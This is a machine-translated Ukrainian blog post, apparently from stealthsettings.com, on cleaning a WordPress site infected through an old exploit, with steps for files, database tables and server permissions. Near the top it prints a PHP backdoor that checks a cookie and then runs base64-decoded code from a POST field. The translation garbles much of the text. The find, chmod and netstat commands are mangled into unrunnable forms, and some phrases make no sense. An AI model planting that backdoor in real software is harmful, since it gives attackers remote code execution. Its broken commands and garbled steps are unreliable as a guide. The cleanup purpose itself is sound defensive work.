WordPress Експлойт - очищення вірусних файлів, SQL та безпеки сервера.

Перш ніж читати цей пост, ви повинні побачити розмістити тут, Щось зрозуміти. :)

Я знайшов його в декількох файлах блогу на stealthsettings.com, коди, подібні до наведених нижче, які з’явилися в результаті вірусу з подвиг с WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPCЯкщо вище про фото xmlrpc.php від сонний, У GREP сервер, схоже досить багато такого роду у вихідних кодах.

pppffiuuu

Очищення заражених файлів:

Ooookkkk ...
1. Краще рішення, як це робиться резервна копіяІ прибрали бази даних є витирати файли WordPress (Ви можете зберегти wp-config.php та файли, які не мають суворого відношення до платформи wp, після їх ретельної перевірки) з сервера та завантажити оригінали з версії 2.5.1 (З цього приводу і зробити версію оновлення WP :)) http://wordpress.org/download/ . Протріть включаючи файли теми, якщо ви не впевнені, що їх ретельної перевірки.

Це, здається, були порушені й файли з тим, що не були використані, перш ніж на блозі і просто змінити тему, не вирішує проблеми.

./andreea/wp-content/themes/default/index.php:

2. Пошук і видалення всіх файлів, що містять: ... _new.php *, * _old.php, Jpgg *, * Giff, * Pngg і WP-info.txt файл, якщо такі є.

знайти. -name “* _new.php”
знайти. -ім'я “* _old.php”
знайти. -ім'я "* .jpgg"
знайти. -ім'я “* _giff”
знайти. -ім'я “* _pngg”
знайти. -name “wp-info.txt”

3. в / Tmp , Пошук і видалення папок, як tmpYwbzT2

Очищення SQL :

1. у таблиці Таблиця wp_options Перевірте і видаліть рядки: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Все в wp_options, йти до active_plugins і видаліть, якщо є плагін, який закінчується в одному з розширень * _new.php, _old.php *, *. jpgg, *. Гіффен, *. pngg або якщо інший внутрішній підозрюють, уважніше перевіряйте.

3. У таблиці wp_users, Дивіться, якщо є користувач, який не вказав нічого в його правій, колонка user_nicename. Видаліть цього користувача, але запам’ятайте номер у стовпці ID. Цей користувач, ймовірно, використовуватиме "WordPress”Прибл user_login створений і відображається на 00: 00: 00 0000-00-00.

4. Підійдіть до столу wp_usermeta і видалити всі лінії, що належать ID вище.

Після цього очищення sql вимкніть, а потім активуйте будь-який плагін. (у блозі -> Інформаційна панель -> Плагіни)

Secure Server:

1. Подивіться, що файли і каталоги "запису»(chmod 777) і спробуйте поставити a chmod що більше не дозволить їх написання на будь-якому рівні. (chmod 644, наприклад)

Знайти. -Перм-2-LS

2. Подивіться, що файли мають встановлений біт SUID або SGID . Якщо ви не використовуєте ці файли поклали на них chmod 0 або видалити пакет, який вона містить. Вони дуже небезпечні, тому що вони виконують привілеї "група"Або"корінь"Не з нормальними користувацькими привілеями для виконання цього файлу.

знайти / типу F-Перм-04000-LS
знайти / типу F-Перм-02000-LS

3. Перевірте, які порти відкриті і спробувати закрити або захистити ті, які не використовуються.

NetStat-| GREP-я слухаю

Так багато. Розумію Деякі блоги заборонені de Google Search а інші кажуть "Він їх добре зробив!!!" . Ну, я б зробив це за них...але що скажеш, якщо Google почне банити всі сайти формування  БУДЕ спамом і покласти троянів (Trojan.Clicker.HTML) в печиво?

Захоплений технологіями, з 2006 року з радістю пишу на StealthSettings.com. Маю багаторічний досвід роботи з операційними системами: macOS, Windows і Linux, а також з мовами програмування і платформами для блогів (WordPress) та онлайн-магазинів (WooCommerce, Magento, PrestaShop).

Як записатися » Антивірус та безпека » WordPress Експлойт - очищення вірусних файлів, SQL та безпеки сервера.

1 думка на тему:WordPress Експлойт - очищення вірусних файлів, SQL та безпеки сервера. »

Залишити коментар